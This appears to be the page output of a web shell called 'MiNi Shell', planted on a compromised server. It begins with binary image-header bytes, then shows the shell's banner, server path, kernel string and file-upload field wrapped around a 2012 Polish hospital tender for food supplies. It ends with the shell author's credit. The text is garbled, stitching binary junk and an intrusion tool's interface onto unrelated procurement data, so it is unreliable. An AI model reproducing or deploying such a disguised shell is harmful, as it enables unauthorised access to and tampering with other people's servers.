JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121220/521190-N-2012.html

<p class="kh_header"><b>Morąg: Dostawa artykułów spożywczych   do Szpitala Miejskiego w Morągu Sp. z o.o.</b><br>
<b>Numer ogłoszenia: 521190 - 2012; data zamieszczenia: 20.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Miejski w Morągu Spółka z ograniczoną odpowiedzialnością , ul. Dąbrowskiego 16, 14-300 Morąg, woj. warmińsko-mazurskie, tel. 89 7574231, faks 89 7574593.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzozmorag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych   do Szpitala Miejskiego w Morągu Sp. z o.o..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet  1 .  Pieczywo

L.p.	Nazwa  oferowanego produktu
	J.m.	Średnie
zapotrzebowanie roczne
1.	Chleb  niekrojony zwykły	kg	7300
2.	Chleb razowy	kg	900
3.	Bułka tarta	kg	90

Pakiet  2 .  Mleko i jego  przetwory

L.p.	Nazwa  oferowanego produktu
	J.m.	Średnie
zapotrzebowanie roczne
1.	Mleko 3 %	l	14 600
2.	Śmietana ukwaszona  18 % tł. (400 ml)	l	200
3.	Masło  śmietankowe  82 % tl.	kg	300
4.	Twaróg  półtłusty	kg	770
5.	Ser żółty pełnotłusty	kg	480
6.	Ser  topiony śmietankowy (trójkąt )	szt	1000
7.	Ser topiony śmietankowy ( plastry)	szt	1 000
8	Ser topiony kostka	szt	1000
9	Masło roślinne 0,25 kg	kg	300
						                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       Pakiet  3  .  Produkty zbożowe i ich przetwory

L.p.	Nazwa  oferowanego produktu
	J.m.	Średnie
zapotrzebowanie roczne
1.	Mąka  pszenna  typ 550	kg	600
2.	Mąka  ziemniaczana	kg	120
3.	Płatki owsiane zwykłe	kg	360
4.	Płatki jęczmienne  zwykłe	kg	360
5.	Ryż biały	kg	600
6.	Makaron świderki	kg	360
7.	Makaron nitki	kg	480
8	Kasza manna	kg	480
9	Kasza jęczmienna	kg	480
10	Kasza jęczmienna pęczak	kg	60
11	Kasza gryczana	kg	60
12	Kleik ryżowy	kg	360

Pakiet  4.  Tłuszcze
L.p.	Nazwa  oferowanego produktu
	J.m.	Średnie
zapotrzebowanie  roczne
1.	Olej rzepakowy 1 l	szt	480
2.	Olej słonecznikowy 1 l	szt	300
3.	Majonez  280 g 	szt	150

Pakiet  5.  Cukier

L.p.	Nazwa  oferowanego produktu
	J.m.	Średnie
zapotrzebowanie  roczne
1.	Cukier paczkowany 	kg	1 080
2.	Cukier puder	kg	20

Pakiet  6. Wędlina 

L.p.	Nazwa  oferowanego produktu
	J.m.	Średnie
zapotrzebowanie  roczne
1.	Polędwica z warzywami	kg	360
2.	Szynka drobiowa z fileta	kg	360
3.	Szynka  drobiowa  mielona 	kg	360
4.	Szynka wieprzowa 	kg	360
5.	Szynka wieprzowa mielona	kg	360
6.	Luncheon	kg	360
7.	Parówki cienkie -powyżej 50 % mięsa	kg	360
8.	Kiełbasa zwyczajna	kg	100
9.	Pasztetowa drobiowa 	kg	600
10.	Pasztet pieczony z indyka	kg	600
11.	Szynka konserwowa 	kg	360
12	Kiełbasa krakowska parzona	kg	360
13	Kiełbasa szynkowa	kg	360
14	Boczek  wędzony	kg	120
15	Smalec wieprzowy kostka 0,25 kg	kg	50


Pakiet  7. Przyprawy i inne produkty spożywcze 

L.p.	Nazwa  oferowanego produktu	J.m.	Średnie
zapotrzebowanie  roczne
1	Sól warzona  miałka	kg	360
2	Kwasek cytrynowy  20 g	szt	360
3	Przyprawa jarzynka 200 g	szt	360
4	Majeranek  20 g 	szt	120
5	Pieprz ziołowy 20 g	szt	200
6	Pieprz naturalny mielony 20 g	szt	200
7	Przyprawa  maggi  1 l	szt	180
8	Cukier waniliowy  16 g	szt	120
9	Musztarda serepska 180 g	szt	300
10	Kisiel 40 g	szt	800
11	Kawa zbożowa 0,5 kg	kg	150
12	Fasola Jaś	kg	200
13	Fasola  biała drobna	kg	90
14	Groch połówki	szt	90
15	Herbata  granulowa 100 g	kg	14
16	Liść laurowy  18 g	op	100
17	Ziele angielskie 20 g	op	240
18	Miód (jednorazowe opakowanie 25 g)	szt	2 400
19	Ocet  0,5 l	szt	300
20	Kakao naturalne ciemne 100 g	kg	20
21	Koper suszony (ok. 200 g)	kg	5
22	Pietruszka nać suszona (ok. 200 g)	kg	5
23	Woda mineralna gazowana 1,5 l	szt	2 000
24	Woda mineralna niegazowana  1,5 l	szt	2 000
25	Cynamon  mielony (20g)	szt	50
26	Papryka słodka ( 20 g)	szt	100
27	Zelatyna (50 g)	szt	100
28	Budyń (40 g )	szt	500
29	Syrop - sok  (1 l )	szt	100
30	Chrupki kukurydziane (200g)	szt	300
31	Herbatniki paczkowane ( 100 g)	szt	300
32	Płatki kukurydziane ( 1 kg)	szt	200
33	Sałatka szwedzka -słoik  400g)	szt	200
                                                                                                                          
Pakiet  8 .  Ryby

L.p.	Nazwa  oferowanego produktu
	J.m.	Średnie
zapotrzebowanie roczne
1.	Panga  biała 	kg	300
2	Dorsz filet bez  skóry	kg	300
3	Makrela wędzona 	kg	120


Pakiet  9 .  Mrożonki

L.p.	Nazwa  oferowanego produktu
	J.m.	Średnie
zapotrzebowanie roczne
1.	Kalafior  mrożony 	kg	360
2.	Fasolka  szparagowa  mrożona	kg	360
3.	Mieszanka 7-składnikowa  warzywna	kg	360
4.	Mieszanka kompotowa	kg	120
5.	Brokuł mrożony	kg	360
6	Szpinak	kg	300
                                                                                                
Pakiet 10. Mięso 

L.p.	Nazwa  oferowanego produktu
	J.m.	Średnie
zapotrzebowanie  roczne
1.	Łopatka wieprzowa bk	kg	1000
2.	Schab zk	kg	400
3.	Karkówka wieprzowa z  kością	kg	400
4.	Boczek surowy 	kg	120
5.	Żeberka paski	kg	400

Pakiet :  11 . Drób 

L.p.	Nazwa  oferowanego produktu
	J.m.	Średnie
zapotrzebowanie roczne
1.	Kurczak świeży 	kg	700
2.	Ćwiartka - kurczak	kg	1 500
3.	Porcja rosołowa	kg	480
4	Wątróbka  drobiowa  indycza ,  	kg	300
5.	Wątróbka drobiowa z kurczaka	kg	300
6	Filet z piersi kurczaka	kg	400



Pakiet   12.  Warzywa 

L.p.	Nazwa  oferowanego produktu
	J.m.	Średnie
zapotrzebowanie roczne
1.	Ziemniaki	kg 	14 400
2.	Marchew 	kg	5 760
3.	Seler	kg	480
4.	Pietruszka	kg	480
5.	Buraki ćwikłowa 	kg	2 880
6.	Por	kg	240
7	Kapusta biała 	kg	600
8	Jabłka	kg	1 500
9	Cebula	kg	120
10	Kapusta  pekińska 	kg	200
    
Pakiet 13 Warzywa kiszone

L.p.	Nazwa  oferowanego produktu
	J.m.	Średnie
zapotrzebowanie roczne
1.	Ogórek kiszony	kg 	120
2.	Kapusta kiszona	kg	120



Pakiet  14.  Przetwory owocowe i warzywne 

L.p.	Nazwa  oferowanego produktu
	J.m.	Średnie
zapotrzebowanie roczne
1.	Dżem  poj. 260 g	szt.	300
2.	Dżem (jednorazowe opakowanie 25 g)	szt	2400
3.	Groszek konserwowy  400 g	szt.	600
4.	Kukurydza konserwowa 400 g	szt.	600
5	Koncentrat pomidorowy 0,9 l	szt.	300
6.	Koncentrat pomidorowy  180 g-30%	szt	300

Pakiet  15. Jaja

L.p.	Nazwa  oferowanego produktu
	J.m.	Średnie
zapotrzebowanie roczne
1.	Jajka  kat. I	szt	9 000.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6, 15.51.10.00-3, 15.61.33.00-1, 15.40.00.00-2, 15.83.00.00-5, 15.13.11.30-5, 15.87.00.00-7, 15.22.10.00-3, 15.33.11.00-8, 15.11.00.00-2, 15.11.20.00-6, 15.30.00.00-1, 15.33.21.00-5, 15.33.10.00-7, 03.14.25.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczegółowych wymagań dotyczących tego warunku;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczegółowych wymagań dotyczących tego warunku;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczegółowych wymagań dotyczących tego warunku;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczegółowych wymagań dotyczących tego warunku;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczegółowych wymagań dotyczących tego warunku;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie o  obowiązujących w  zakładzie zasadach systemu HACCP - analizy zagrożeń i    
  krytycznych  punktów kontroli w celu wykazania że wykonawca  spełnia warunki udziału w 
  postępowaniu zakresie warunku  wskazanego w  punkcie 5 ust. 1 pkt 1.1-załącznik nr 6
  Nie dotyczy zadania 12
 - decyzję  o przystosowaniu środka transportu do przewożenia artykułów  spożywczych   
   Nie dotyczy zadania 12</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.wypełniony i podpisany formularz ofertowy i cenowy  - załącznik nr 2 i 4 do SIWZ                        2.w przypadku, gdy umocowanie do reprezentowania wykonawcy nie wynika ze stosownego dokumentu, a w szczególności z odpisu z właściwego rejestru, należy załączyć stosowne pełnomocnictwo.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a /zmiany stawki podatku VAT, przy czym zmianie ulegnie wyłącznie cena brutto, cena   netto    
     pozostanie bez zmian;
b/  Zmiany wymienione w ppkt a) następują z mocy prawa i obowiązują od dnia obowiązywania 
    odpowiednich przepisów
 
 c/Strony dopuszczają zmianę cen jednostkowych towarów objętych umową  w przypadku   
     zmiany wielkości opakowania wprowadzonej przez producenta  z zachowaniem zasady  proporcjonalności w stosunku do ceny objętej umową.
d/ Strony dopuszczają możliwość przedłużenia okresu trwania umowy w przypadku nie wykorzystania kwoty na jaką zawarta była umowa do momentu wykorzystania kwoty objętej umową</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzozmorag.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Miejski w Morągu Sp.z o.o.
14-300 Morąg ul.Dąbrowskiego 16
pokój nr 18 w budynku administracyjnym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.01.2013 godzina 11:45, miejsce: Szpital Miejski w Morągu Sp.z o.o.
14-300 Morąg ul.Dąbrowskiego 16
pokój nr 18 w budynku administracyjnym.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com